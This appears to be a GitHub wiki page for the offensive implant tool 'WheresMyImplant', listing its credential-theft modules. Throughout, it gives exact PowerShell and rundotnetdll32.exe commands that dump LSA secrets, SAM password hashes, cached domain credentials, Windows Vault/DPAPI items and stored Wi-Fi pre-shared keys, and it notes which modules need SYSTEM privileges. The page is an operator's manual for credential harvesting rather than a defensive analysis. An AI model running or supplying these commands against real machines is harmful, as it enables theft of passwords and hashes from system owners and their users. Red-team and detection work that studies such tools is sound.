-
Notifications
You must be signed in to change notification settings - Fork 58
Credential Modules
Reads the LSA Secrets (e.g. plaintext service logon credentials) from the Windows Registry. Requires SYSTEM privileges.
[WheresMyImplant.Credentials]::DumpLSA()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpLSA
Reads the local user password hashes from the registry. Requires SYSTEM privileges.
[WheresMyImplant.Credentials]::DumpSAM()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpSAM
Reads the cached Domain User credentials. Requires SYSTEM privileges.
[WheresMyImplant.Credentials]::DumpDomainCache()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpDomainCache
Reads the Windows Vault for items stored with the DPAPI.
[WheresMyImplant.Credentials]::DumpVault()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpVault
Reads the Windows Vault for items stored with the DPAPI. Alternative method to accessing the Windows Vault
[WheresMyImplant.Credentials]::DumpVaultCLI()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpVaultCLI
Reads wireless preshared keys from the stored wireless profiles.
[WheresMyImplant.Credentials]::WirelessPreSharedKey()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,WirelessPreSharedKey